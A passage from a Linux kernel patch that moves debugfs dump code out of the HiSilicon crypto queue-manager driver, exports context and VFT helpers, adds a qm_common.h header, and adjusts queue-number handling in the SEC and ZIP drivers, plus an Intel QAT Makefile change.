++		factor = &qm->factor[fun_num];
++
++	ret = readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
++					 val & BIT(0), POLL_PERIOD,
++					 POLL_TIMEOUT);
+ 	if (ret)
+ 		return ret;
+ 
+-	sqe = kzalloc(qm->sqe_size * sq_depth, GFP_KERNEL);
+-	if (!sqe)
+-		return -ENOMEM;
++	writel(0x0, qm->io_base + QM_VFT_CFG_OP_WR);
++	writel(type, qm->io_base + QM_VFT_CFG_TYPE);
++	if (type == SHAPER_VFT)
++		fun_num |= base << QM_SHAPER_VFT_OFFSET;
+ 
+-	qp = &qm->qp_array[qp_id];
+-	memcpy(sqe, qp->sqe, qm->sqe_size * sq_depth);
+-	sqe_curr = sqe + (u32)(sqe_id * qm->sqe_size);
+-	memset(sqe_curr + qm->debug.sqe_mask_offset, QM_SQE_ADDR_MASK,
+-	       qm->debug.sqe_mask_len);
++	writel(fun_num, qm->io_base + QM_VFT_CFG);
+ 
+-	dump_show(qm, sqe_curr, qm->sqe_size, "SQE");
++	qm_vft_data_cfg(qm, type, base, number, factor);
+ 
+-	kfree(sqe);
++	writel(0x0, qm->io_base + QM_VFT_CFG_RDY);
++	writel(0x1, qm->io_base + QM_VFT_CFG_OP_ENABLE);
+ 
+-	return 0;
++	return readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
++					  val & BIT(0), POLL_PERIOD,
++					  POLL_TIMEOUT);
+ }
+ 
+-static int qm_cq_dump(struct hisi_qm *qm, char *s)
++static int qm_shaper_init_vft(struct hisi_qm *qm, u32 fun_num)
+ {
+-	struct qm_cqe *cqe_curr;
+-	struct hisi_qp *qp;
+-	u32 qp_id, cqe_id;
+-	int ret;
++	u32 qos = qm->factor[fun_num].func_qos;
++	int ret, i;
+ 
+-	ret = q_dump_param_parse(qm, s, &cqe_id, &qp_id, qm->qp_array->cq_depth);
+-	if (ret)
++	ret = qm_get_shaper_para(qos * QM_QOS_RATE, &qm->factor[fun_num]);
++	if (ret) {
++		dev_err(&qm->pdev->dev, "failed to calculate shaper parameter!\n");
+ 		return ret;
+-
+-	qp = &qm->qp_array[qp_id];
+-	cqe_curr = qp->cqe + cqe_id;
+-	dump_show(qm, cqe_curr, sizeof(struct qm_cqe), "CQE");
++	}
++	writel(qm->type_rate, qm->io_base + QM_SHAPER_CFG);
++	for (i = ALG_TYPE_0; i <= ALG_TYPE_1; i++) {
++		/* The base number of queue reuse for different alg type */
++		ret = qm_set_vft_common(qm, SHAPER_VFT, fun_num, i, 1);
++		if (ret)
++			return ret;
++	}
+ 
+ 	return 0;
+ }
+ 
+-static int qm_eq_aeq_dump(struct hisi_qm *qm, const char *s,
+-			  size_t size, char *name)
++/* The config should be conducted after qm_dev_mem_reset() */
++static int qm_set_sqc_cqc_vft(struct hisi_qm *qm, u32 fun_num, u32 base,
++			      u32 number)
+ {
+-	struct device *dev = &qm->pdev->dev;
+-	void *xeqe;
+-	u32 xeqe_id;
+-	int ret;
+-
+-	if (!s)
+-		return -EINVAL;
+-
+-	ret = kstrtou32(s, 0, &xeqe_id);
+-	if (ret)
+-		return -EINVAL;
++	int ret, i;
+ 
+-	if (!strcmp(name, "EQE") && xeqe_id >= qm->eq_depth) {
+-		dev_err(dev, "Please input eqe num (0-%u)", qm->eq_depth - 1);
+-		return -EINVAL;
+-	} else if (!strcmp(name, "AEQE") && xeqe_id >= qm->aeq_depth) {
+-		dev_err(dev, "Please input aeqe num (0-%u)", qm->eq_depth - 1);
+-		return -EINVAL;
++	for (i = SQC_VFT; i <= CQC_VFT; i++) {
++		ret = qm_set_vft_common(qm, i, fun_num, base, number);
++		if (ret)
++			return ret;
+ 	}
+ 
+-	down_read(&qm->qps_lock);
+-
+-	if (qm->eqe && !strcmp(name, "EQE")) {
+-		xeqe = qm->eqe + xeqe_id;
+-	} else if (qm->aeqe && !strcmp(name, "AEQE")) {
+-		xeqe = qm->aeqe + xeqe_id;
+-	} else {
+-		ret = -EINVAL;
+-		goto err_unlock;
++	/* init default shaper qos val */
++	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps)) {
++		ret = qm_shaper_init_vft(qm, fun_num);
++		if (ret)
++			goto back_sqc_cqc;
+ 	}
+ 
+-	dump_show(qm, xeqe, size, name);
++	return 0;
++back_sqc_cqc:
++	for (i = SQC_VFT; i <= CQC_VFT; i++)
++		qm_set_vft_common(qm, i, fun_num, 0, 0);
+ 
+-err_unlock:
+-	up_read(&qm->qps_lock);
+ 	return ret;
+ }
+ 
+-static int qm_dbg_help(struct hisi_qm *qm, char *s)
++static int qm_get_vft_v2(struct hisi_qm *qm, u32 *base, u32 *number)
+ {
+-	struct device *dev = &qm->pdev->dev;
++	u64 sqc_vft;
++	int ret;
+ 
+-	if (strsep(&s, " ")) {
+-		dev_err(dev, "Please do not input extra characters!\n");
+-		return -EINVAL;
+-	}
++	ret = hisi_qm_mb(qm, QM_MB_CMD_SQC_VFT_V2, 0, 0, 1);
++	if (ret)
++		return ret;
+ 
+-	dev_info(dev, "available commands:\n");
+-	dev_info(dev, "sqc <num>\n");
+-	dev_info(dev, "cqc <num>\n");
+-	dev_info(dev, "eqc\n");
+-	dev_info(dev, "aeqc\n");
+-	dev_info(dev, "sq <num> <e>\n");
+-	dev_info(dev, "cq <num> <e>\n");
+-	dev_info(dev, "eq <e>\n");
+-	dev_info(dev, "aeq <e>\n");
++	sqc_vft = readl(qm->io_base + QM_MB_CMD_DATA_ADDR_L) |
++		  ((u64)readl(qm->io_base + QM_MB_CMD_DATA_ADDR_H) << 32);
++	*base = QM_SQC_VFT_BASE_MASK_V2 & (sqc_vft >> QM_SQC_VFT_BASE_SHIFT_V2);
++	*number = (QM_SQC_VFT_NUM_MASK_v2 &
++		   (sqc_vft >> QM_SQC_VFT_NUM_SHIFT_V2)) + 1;
+ 
+ 	return 0;
+ }
+ 
+-static int qm_cmd_write_dump(struct hisi_qm *qm, const char *cmd_buf)
++void *hisi_qm_ctx_alloc(struct hisi_qm *qm, size_t ctx_size,
++			  dma_addr_t *dma_addr)
+ {
+ 	struct device *dev = &qm->pdev->dev;
+-	char *presult, *s, *s_tmp;
+-	int ret;
+-
+-	s = kstrdup(cmd_buf, GFP_KERNEL);
+-	if (!s)
+-		return -ENOMEM;
+-
+-	s_tmp = s;
+-	presult = strsep(&s, " ");
+-	if (!presult) {
+-		ret = -EINVAL;
+-		goto err_buffer_free;
+-	}
+-
+-	if (!strcmp(presult, "sqc"))
+-		ret = qm_sqc_dump(qm, s);
+-	else if (!strcmp(presult, "cqc"))
+-		ret = qm_cqc_dump(qm, s);
+-	else if (!strcmp(presult, "eqc"))
+-		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_eqc),
+-				       QM_MB_CMD_EQC, "EQC");
+-	else if (!strcmp(presult, "aeqc"))
+-		ret = qm_eqc_aeqc_dump(qm, s, sizeof(struct qm_aeqc),
+-				       QM_MB_CMD_AEQC, "AEQC");
+-	else if (!strcmp(presult, "sq"))
+-		ret = qm_sq_dump(qm, s);
+-	else if (!strcmp(presult, "cq"))
+-		ret = qm_cq_dump(qm, s);
+-	else if (!strcmp(presult, "eq"))
+-		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_eqe), "EQE");
+-	else if (!strcmp(presult, "aeq"))
+-		ret = qm_eq_aeq_dump(qm, s, sizeof(struct qm_aeqe), "AEQE");
+-	else if (!strcmp(presult, "help"))
+-		ret = qm_dbg_help(qm, s);
+-	else
+-		ret = -EINVAL;
++	void *ctx_addr;
+ 
+-	if (ret)
+-		dev_info(dev, "Please echo help\n");
++	ctx_addr = kzalloc(ctx_size, GFP_KERNEL);
++	if (!ctx_addr)
++		return ERR_PTR(-ENOMEM);
+ 
+-err_buffer_free:
+-	kfree(s_tmp);
++	*dma_addr = dma_map_single(dev, ctx_addr, ctx_size, DMA_FROM_DEVICE);
++	if (dma_mapping_error(dev, *dma_addr)) {
++		dev_err(dev, "DMA mapping error!\n");
++		kfree(ctx_addr);
++		return ERR_PTR(-ENOMEM);
++	}
+ 
+-	return ret;
++	return ctx_addr;
+ }
+ 
+-static ssize_t qm_cmd_write(struct file *filp, const char __user *buffer,
+-			    size_t count, loff_t *pos)
++void hisi_qm_ctx_free(struct hisi_qm *qm, size_t ctx_size,
++			const void *ctx_addr, dma_addr_t *dma_addr)
+ {
+-	struct hisi_qm *qm = filp->private_data;
+-	char *cmd_buf, *cmd_buf_tmp;
+-	int ret;
+-
+-	if (*pos)
+-		return 0;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return ret;
+-
+-	/* Judge if the instance is being reset. */
+-	if (unlikely(atomic_read(&qm->status.flags) == QM_STOP)) {
+-		ret = 0;
+-		goto put_dfx_access;
+-	}
+-
+-	if (count > QM_DBG_WRITE_LEN) {
+-		ret = -ENOSPC;
+-		goto put_dfx_access;
+-	}
+-
+-	cmd_buf = memdup_user_nul(buffer, count);
+-	if (IS_ERR(cmd_buf)) {
+-		ret = PTR_ERR(cmd_buf);
+-		goto put_dfx_access;
+-	}
+-
+-	cmd_buf_tmp = strchr(cmd_buf, '\n');
+-	if (cmd_buf_tmp) {
+-		*cmd_buf_tmp = '\0';
+-		count = cmd_buf_tmp - cmd_buf + 1;
+-	}
+-
+-	ret = qm_cmd_write_dump(qm, cmd_buf);
+-	if (ret) {
+-		kfree(cmd_buf);
+-		goto put_dfx_access;
+-	}
+-
+-	kfree(cmd_buf);
+-
+-	ret = count;
++	struct device *dev = &qm->pdev->dev;
+ 
+-put_dfx_access:
+-	hisi_qm_put_dfx_access(qm);
+-	return ret;
++	dma_unmap_single(dev, *dma_addr, ctx_size, DMA_FROM_DEVICE);
++	kfree(ctx_addr);
+ }
+ 
+-static const struct file_operations qm_cmd_fops = {
+-	.owner = THIS_MODULE,
+-	.open = simple_open,
+-	.read = qm_cmd_read,
+-	.write = qm_cmd_write,
+-};
+-
+-static void qm_create_debugfs_file(struct hisi_qm *qm, struct dentry *dir,
+-				   enum qm_debug_file index)
++static int qm_dump_sqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
+ {
+-	struct debugfs_file *file = qm->debug.files + index;
+-
+-	debugfs_create_file(qm_debug_file_name[index], 0600, dir, file,
+-			    &qm_debug_fops);
++	return hisi_qm_mb(qm, QM_MB_CMD_SQC, dma_addr, qp_id, 1);
++}
+ 
+-	file->index = index;
+-	mutex_init(&file->lock);
+-	file->debug = &qm->debug;
++static int qm_dump_cqc_raw(struct hisi_qm *qm, dma_addr_t dma_addr, u16 qp_id)
++{
++	return hisi_qm_mb(qm, QM_MB_CMD_CQC, dma_addr, qp_id, 1);
+ }
+ 
+ static void qm_hw_error_init_v1(struct hisi_qm *qm)
+@@ -3100,7 +2128,7 @@ static int qm_drain_qp(struct hisi_qp *qp)
+ 		return ret;
+ 	}
+ 
+-	addr = qm_ctx_alloc(qm, size, &dma_addr);
++	addr = hisi_qm_ctx_alloc(qm, size, &dma_addr);
+ 	if (IS_ERR(addr)) {
+ 		dev_err(dev, "Failed to alloc ctx for sqc and cqc!\n");
+ 		return -ENOMEM;
+@@ -3135,7 +2163,7 @@ static int qm_drain_qp(struct hisi_qp *qp)
+ 		usleep_range(WAIT_PERIOD_US_MIN, WAIT_PERIOD_US_MAX);
+ 	}
+ 
+-	qm_ctx_free(qm, size, addr, &dma_addr);
++	hisi_qm_ctx_free(qm, size, addr, &dma_addr);
+ 
+ 	return ret;
+ }
+@@ -3659,7 +2687,6 @@ static void hisi_qm_pre_init(struct hisi_qm *qm)
+ 	mutex_init(&qm->mailbox_lock);
+ 	init_rwsem(&qm->qps_lock);
+ 	qm->qp_in_used = 0;
+-	qm->misc_ctl = false;
+ 	if (test_bit(QM_SUPPORT_RPM, &qm->caps)) {
+ 		if (!acpi_device_power_manageable(ACPI_COMPANION(&pdev->dev)))
+ 			dev_info(&pdev->dev, "_PS0 and _PR0 are not defined");
+@@ -3720,17 +2747,6 @@ static void hisi_qm_set_state(struct hisi_qm *qm, u8 state)
+ 		writel(state, qm->io_base + QM_VF_STATE);
+ }
+ 
+-static void qm_last_regs_uninit(struct hisi_qm *qm)
+-{
+-	struct qm_debug *debug = &qm->debug;
+-
+-	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
+-		return;
+-
+-	kfree(debug->qm_last_words);
+-	debug->qm_last_words = NULL;
+-}
+-
+ static void hisi_qm_unint_work(struct hisi_qm *qm)
+ {
+ 	destroy_workqueue(qm->wq);
+@@ -3761,8 +2777,6 @@ static void hisi_qm_memory_uninit(struct hisi_qm *qm)
+  */
+ void hisi_qm_uninit(struct hisi_qm *qm)
+ {
+-	qm_last_regs_uninit(qm);
+-
+ 	qm_cmd_uninit(qm);
+ 	hisi_qm_unint_work(qm);
+ 	down_write(&qm->qps_lock);
+@@ -4131,45 +3145,6 @@ err_unlock:
+ }
+ EXPORT_SYMBOL_GPL(hisi_qm_stop);
+ 
+-static ssize_t qm_status_read(struct file *filp, char __user *buffer,
+-			      size_t count, loff_t *pos)
+-{
+-	struct hisi_qm *qm = filp->private_data;
+-	char buf[QM_DBG_READ_LEN];
+-	int val, len;
+-
+-	val = atomic_read(&qm->status.flags);
+-	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n", qm_s[val]);
+-
+-	return simple_read_from_buffer(buffer, count, pos, buf, len);
+-}
+-
+-static const struct file_operations qm_status_fops = {
+-	.owner = THIS_MODULE,
+-	.open = simple_open,
+-	.read = qm_status_read,
+-};
+-
+-static int qm_debugfs_atomic64_set(void *data, u64 val)
+-{
+-	if (val)
+-		return -EINVAL;
+-
+-	atomic64_set((atomic64_t *)data, 0);
+-
+-	return 0;
+-}
+-
+-static int qm_debugfs_atomic64_get(void *data, u64 *val)
+-{
+-	*val = atomic64_read((atomic64_t *)data);
+-
+-	return 0;
+-}
+-
+-DEFINE_DEBUGFS_ATTRIBUTE(qm_atomic64_ops, qm_debugfs_atomic64_get,
+-			 qm_debugfs_atomic64_set, "%llu\n");
+-
+ static void qm_hw_error_init(struct hisi_qm *qm)
+ {
+ 	if (!qm->ops->hw_error_init) {
+@@ -4708,7 +3683,7 @@ static const struct file_operations qm_algqos_fops = {
+  *
+  * Create function qos debugfs files, VF ping PF to get function qos.
+  */
+-static void hisi_qm_set_algqos_init(struct hisi_qm *qm)
++void hisi_qm_set_algqos_init(struct hisi_qm *qm)
+ {
+ 	if (qm->fun_type == QM_HW_PF)
+ 		debugfs_create_file("alg_qos", 0644, qm->debug.debug_root,
+@@ -4718,88 +3693,6 @@ static void hisi_qm_set_algqos_init(struct hisi_qm *qm)
+ 				    qm, &qm_algqos_fops);
+ }
+ 
+-/**
+- * hisi_qm_debug_init() - Initialize qm related debugfs files.
+- * @qm: The qm for which we want to add debugfs files.
+- *
+- * Create qm related debugfs files.
+- */
+-void hisi_qm_debug_init(struct hisi_qm *qm)
+-{
+-	struct dfx_diff_registers *qm_regs = qm->debug.qm_diff_regs;
+-	struct qm_dfx *dfx = &qm->debug.dfx;
+-	struct dentry *qm_d;
+-	void *data;
+-	int i;
+-
+-	qm_d = debugfs_create_dir("qm", qm->debug.debug_root);
+-	qm->debug.qm_d = qm_d;
+-
+-	/* only show this in PF */
+-	if (qm->fun_type == QM_HW_PF) {
+-		qm_create_debugfs_file(qm, qm->debug.debug_root, CURRENT_QM);
+-		for (i = CURRENT_Q; i < DEBUG_FILE_NUM; i++)
+-			qm_create_debugfs_file(qm, qm->debug.qm_d, i);
+-	}
+-
+-	if (qm_regs)
+-		debugfs_create_file("diff_regs", 0444, qm->debug.qm_d,
+-					qm, &qm_diff_regs_fops);
+-
+-	debugfs_create_file("regs", 0444, qm->debug.qm_d, qm, &qm_regs_fops);
+-
+-	debugfs_create_file("cmd", 0600, qm->debug.qm_d, qm, &qm_cmd_fops);
+-
+-	debugfs_create_file("status", 0444, qm->debug.qm_d, qm,
+-			&qm_status_fops);
+-	for (i = 0; i < ARRAY_SIZE(qm_dfx_files); i++) {
+-		data = (atomic64_t *)((uintptr_t)dfx + qm_dfx_files[i].offset);
+-		debugfs_create_file(qm_dfx_files[i].name,
+-			0644,
+-			qm_d,
+-			data,
+-			&qm_atomic64_ops);
+-	}
+-
+-	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
+-		hisi_qm_set_algqos_init(qm);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_debug_init);
+-
+-/**
+- * hisi_qm_debug_regs_clear() - clear qm debug related registers.
+- * @qm: The qm for which we want to clear its debug registers.
+- */
+-void hisi_qm_debug_regs_clear(struct hisi_qm *qm)
+-{
+-	const struct debugfs_reg32 *regs;
+-	int i;
+-
+-	/* clear current_qm */
+-	writel(0x0, qm->io_base + QM_DFX_MB_CNT_VF);
+-	writel(0x0, qm->io_base + QM_DFX_DB_CNT_VF);
+-
+-	/* clear current_q */
+-	writel(0x0, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
+-	writel(0x0, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
+-
+-	/*
+-	 * these registers are reading and clearing, so clear them after
+-	 * reading them.
+-	 */
+-	writel(0x1, qm->io_base + QM_DFX_CNT_CLR_CE);
+-
+-	regs = qm_dfx_regs;
+-	for (i = 0; i < CNT_CYC_REGS_NUM; i++) {
+-		readl(qm->io_base + regs->offset);
+-		regs++;
+-	}
+-
+-	/* clear clear_enable */
+-	writel(0x0, qm->io_base + QM_DFX_CNT_CLR_CE);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_debug_regs_clear);
+-
+ static void hisi_qm_init_vf_qos(struct hisi_qm *qm, int total_func)
+ {
+ 	int i;
+@@ -5438,24 +4331,6 @@ static int qm_controller_reset_done(struct hisi_qm *qm)
+ 	return 0;
+ }
+ 
+-static void qm_show_last_dfx_regs(struct hisi_qm *qm)
+-{
+-	struct qm_debug *debug = &qm->debug;
+-	struct pci_dev *pdev = qm->pdev;
+-	u32 val;
+-	int i;
+-
+-	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
+-		return;
+-
+-	for (i = 0; i < ARRAY_SIZE(qm_dfx_regs); i++) {
+-		val = readl_relaxed(qm->io_base + qm_dfx_regs[i].offset);
+-		if (debug->qm_last_words[i] != val)
+-			pci_info(pdev, "%s \t= 0x%08x => 0x%08x\n",
+-			qm_dfx_regs[i].name, debug->qm_last_words[i], val);
+-	}
+-}
+-
+ static int qm_controller_reset(struct hisi_qm *qm)
+ {
+ 	struct pci_dev *pdev = qm->pdev;
+@@ -5471,7 +4346,7 @@ static int qm_controller_reset(struct hisi_qm *qm)
+ 		return ret;
+ 	}
+ 
+-	qm_show_last_dfx_regs(qm);
++	hisi_qm_show_last_dfx_regs(qm);
+ 	if (qm->err_ini->show_last_dfx_regs)
+ 		qm->err_ini->show_last_dfx_regs(qm);
+ 
+@@ -6091,6 +4966,7 @@ free_eq_irq:
+ 
+ static int qm_get_qp_num(struct hisi_qm *qm)
+ {
++	struct device *dev = &qm->pdev->dev;
+ 	bool is_db_isolation;
+ 
+ 	/* VF's qp_num assigned by PF in v2, and VF can get qp_num by vft. */
+@@ -6107,13 +4983,21 @@ static int qm_get_qp_num(struct hisi_qm *qm)
+ 	qm->max_qp_num = hisi_qm_get_hw_info(qm, qm_basic_info,
+ 					     QM_FUNC_MAX_QP_CAP, is_db_isolation);
+ 
+-	/* check if qp number is valid */
+-	if (qm->qp_num > qm->max_qp_num) {
+-		dev_err(&qm->pdev->dev, "qp num(%u) is more than max qp num(%u)!\n",
++	if (qm->qp_num <= qm->max_qp_num)
++		return 0;
++
++	if (test_bit(QM_MODULE_PARAM, &qm->misc_ctl)) {
++		/* Check whether the set qp number is valid */
++		dev_err(dev, "qp num(%u) is more than max qp num(%u)!\n",
+ 			qm->qp_num, qm->max_qp_num);
+ 		return -EINVAL;
+ 	}
+ 
++	dev_info(dev, "Default qp num(%u) is too big, reset it to Function's max qp num(%u)!\n",
++		 qm->qp_num, qm->max_qp_num);
++	qm->qp_num = qm->max_qp_num;
++	qm->debug.curr_qm_qp_num = qm->qp_num;
++
+ 	return 0;
+ }
+ 
+@@ -6358,26 +5242,6 @@ err_destroy_idr:
+ 	return ret;
+ }
+ 
+-static void qm_last_regs_init(struct hisi_qm *qm)
+-{
+-	int dfx_regs_num = ARRAY_SIZE(qm_dfx_regs);
+-	struct qm_debug *debug = &qm->debug;
+-	int i;
+-
+-	if (qm->fun_type == QM_HW_VF)
+-		return;
+-
+-	debug->qm_last_words = kcalloc(dfx_regs_num, sizeof(unsigned int),
+-								GFP_KERNEL);
+-	if (!debug->qm_last_words)
+-		return;
+-
+-	for (i = 0; i < dfx_regs_num; i++) {
+-		debug->qm_last_words[i] = readl_relaxed(qm->io_base +
+-			qm_dfx_regs[i].offset);
+-	}
+-}
+-
+ /**
+  * hisi_qm_init() - Initialize configures about qm.
+  * @qm: The qm needing init.
+@@ -6426,8 +5290,6 @@ int hisi_qm_init(struct hisi_qm *qm)
+ 	qm_cmd_init(qm);
+ 	atomic_set(&qm->status.flags, QM_INIT);
+ 
+-	qm_last_regs_init(qm);
+-
+ 	return 0;
+ 
+ err_free_qm_memory:
+diff --git a/drivers/crypto/hisilicon/qm_common.h b/drivers/crypto/hisilicon/qm_common.h
+new file mode 100644
+index 0000000000000..8e36aa9c681be
+--- /dev/null
++++ b/drivers/crypto/hisilicon/qm_common.h
+@@ -0,0 +1,86 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/* Copyright (c) 2022 HiSilicon Limited. */
++#ifndef QM_COMMON_H
++#define QM_COMMON_H
++
++#define QM_DBG_READ_LEN		256
++
++struct qm_cqe {
++	__le32 rsvd0;
++	__le16 cmd_id;
++	__le16 rsvd1;
++	__le16 sq_head;
++	__le16 sq_num;
++	__le16 rsvd2;
++	__le16 w7;
++};
++
++struct qm_eqe {
++	__le32 dw0;
++};
++
++struct qm_aeqe {
++	__le32 dw0;
++};
++
++struct qm_sqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le16 w8;
++	__le16 rsvd0;
++	__le16 pasid;
++	__le16 w11;
++	__le16 cq_num;
++	__le16 w13;
++	__le32 rsvd1;
++};
++
++struct qm_cqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le16 w8;
++	__le16 rsvd0;
++	__le16 pasid;
++	__le16 w11;
++	__le32 dw6;
++	__le32 rsvd1;
++};
++
++struct qm_eqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le32 rsvd[2];
++	__le32 dw6;
++};
++
++struct qm_aeqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le32 rsvd[2];
++	__le32 dw6;
++};
++
++static const char * const qm_s[] = {
++	"init", "start", "close", "stop",
++};
++
++void *hisi_qm_ctx_alloc(struct hisi_qm *qm, size_t ctx_size,
++			dma_addr_t *dma_addr);
++void hisi_qm_ctx_free(struct hisi_qm *qm, size_t ctx_size,
++		      const void *ctx_addr, dma_addr_t *dma_addr);
++void hisi_qm_show_last_dfx_regs(struct hisi_qm *qm);
++void hisi_qm_set_algqos_init(struct hisi_qm *qm);
++
++#endif
+diff --git a/drivers/crypto/hisilicon/sec2/sec_main.c b/drivers/crypto/hisilicon/sec2/sec_main.c
+index 3705412bac5f1..e384988bda917 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_main.c
++++ b/drivers/crypto/hisilicon/sec2/sec_main.c
+@@ -312,8 +312,11 @@ static int sec_diff_regs_show(struct seq_file *s, void *unused)
+ }
+ DEFINE_SHOW_ATTRIBUTE(sec_diff_regs);
+ 
++static bool pf_q_num_flag;
+ static int sec_pf_q_num_set(const char *val, const struct kernel_param *kp)
+ {
++	pf_q_num_flag = true;
++
+ 	return q_num_set(val, kp, PCI_DEVICE_ID_HUAWEI_SEC_PF);
+ }
+ 
+@@ -899,8 +902,7 @@ static int sec_debugfs_init(struct hisi_qm *qm)
+ 	qm->debug.sqe_mask_offset = SEC_SQE_MASK_OFFSET;
+ 	qm->debug.sqe_mask_len = SEC_SQE_MASK_LEN;
+ 
+-	ret = hisi_qm_diff_regs_init(qm, sec_diff_regs,
+-				ARRAY_SIZE(sec_diff_regs));
++	ret = hisi_qm_regs_debugfs_init(qm, sec_diff_regs, ARRAY_SIZE(sec_diff_regs));
+ 	if (ret) {
+ 		dev_warn(dev, "Failed to init SEC diff regs!\n");
+ 		goto debugfs_remove;
+@@ -915,7 +917,7 @@ static int sec_debugfs_init(struct hisi_qm *qm)
+ 	return 0;
+ 
+ failed_to_create:
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
+ debugfs_remove:
+ 	debugfs_remove_recursive(sec_debugfs_root);
+ 	return ret;
+@@ -923,7 +925,7 @@ debugfs_remove:
+ 
+ static void sec_debugfs_exit(struct hisi_qm *qm)
+ {
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
+ 
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ }
+@@ -1123,6 +1125,8 @@ static int sec_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		qm->qp_num = pf_q_num;
+ 		qm->debug.curr_qm_qp_num = pf_q_num;
+ 		qm->qm_list = &sec_devices;
++		if (pf_q_num_flag)
++			set_bit(QM_MODULE_PARAM, &qm->misc_ctl);
+ 	} else if (qm->fun_type == QM_HW_VF && qm->ver == QM_HW_V1) {
+ 		/*
+ 		 * have no way to get qm configure in VM in v1 hardware,
+diff --git a/drivers/crypto/hisilicon/zip/zip_main.c b/drivers/crypto/hisilicon/zip/zip_main.c
+index c863435e8c75a..190b4fecfc747 100644
+--- a/drivers/crypto/hisilicon/zip/zip_main.c
++++ b/drivers/crypto/hisilicon/zip/zip_main.c
+@@ -365,8 +365,11 @@ static u32 uacce_mode = UACCE_MODE_NOUACCE;
+ module_param_cb(uacce_mode, &zip_uacce_mode_ops, &uacce_mode, 0444);
+ MODULE_PARM_DESC(uacce_mode, UACCE_MODE_DESC);
+ 
++static bool pf_q_num_flag;
+ static int pf_q_num_set(const char *val, const struct kernel_param *kp)
+ {
++	pf_q_num_flag = true;
++
+ 	return q_num_set(val, kp, PCI_DEVICE_ID_HUAWEI_ZIP_PF);
+ }
+ 
+@@ -849,8 +852,7 @@ static int hisi_zip_debugfs_init(struct hisi_qm *qm)
+ 	qm->debug.sqe_mask_offset = HZIP_SQE_MASK_OFFSET;
+ 	qm->debug.sqe_mask_len = HZIP_SQE_MASK_LEN;
+ 	qm->debug.debug_root = dev_d;
+-	ret = hisi_qm_diff_regs_init(qm, hzip_diff_regs,
+-				ARRAY_SIZE(hzip_diff_regs));
++	ret = hisi_qm_regs_debugfs_init(qm, hzip_diff_regs, ARRAY_SIZE(hzip_diff_regs));
+ 	if (ret) {
+ 		dev_warn(dev, "Failed to init ZIP diff regs!\n");
+ 		goto debugfs_remove;
+@@ -869,7 +871,7 @@ static int hisi_zip_debugfs_init(struct hisi_qm *qm)
+ 	return 0;
+ 
+ failed_to_create:
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
+ debugfs_remove:
+ 	debugfs_remove_recursive(hzip_debugfs_root);
+ 	return ret;
+@@ -895,7 +897,7 @@ static void hisi_zip_debug_regs_clear(struct hisi_qm *qm)
+ 
+ static void hisi_zip_debugfs_exit(struct hisi_qm *qm)
+ {
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
+ 
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ 
+@@ -1141,6 +1143,8 @@ static int hisi_zip_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		qm->qp_num = pf_q_num;
+ 		qm->debug.curr_qm_qp_num = pf_q_num;
+ 		qm->qm_list = &zip_devices;
++		if (pf_q_num_flag)
++			set_bit(QM_MODULE_PARAM, &qm->misc_ctl);
+ 	} else if (qm->fun_type == QM_HW_VF && qm->ver == QM_HW_V1) {
+ 		/*
+ 		 * have no way to get qm configure in VM in v1 hardware,
+diff --git a/drivers/crypto/qat/qat_common/Makefile b/drivers/crypto/qat/qat_common/Makefile
+index 80919cfcc29da..b0587d03eac29 100644
+--- a/drivers/crypto/qat/qat_common/Makefile
++++ b/drivers/crypto/qat/qat_common/Makefile
+@@ -19,7 +19,8 @@ intel_qat-objs := adf_cfg.o \
+ 	qat_asym_algs.o \
+ 	qat_algs_send.o \
+ 	qat_uclo.o \
+-	qat_hal.o
++	qat_hal.o \
++	qat_bl.o
+ 
+ intel_qat-$(CONFIG_DEBUG_FS) += adf_transport_debug.o
+ intel_qat-$(CONFIG_PCI_IOV) += adf_sriov.o adf_vf_isr.o adf_pfvf_utils.o \
+diff --git a/drivers/crypto/qat/qat_common/adf_accel_devices.h b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+index 20f50d0e65f89..ad01d99e6e2ba 100644
+--- a/drivers/crypto/qat/qat_common/adf_accel_devices.h
++++ b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+@@ -27,7 +27,7 @@
+ #define ADF_PCI_MAX_BARS 3
+ #define ADF_DEVICE_NAME_LENGTH 32
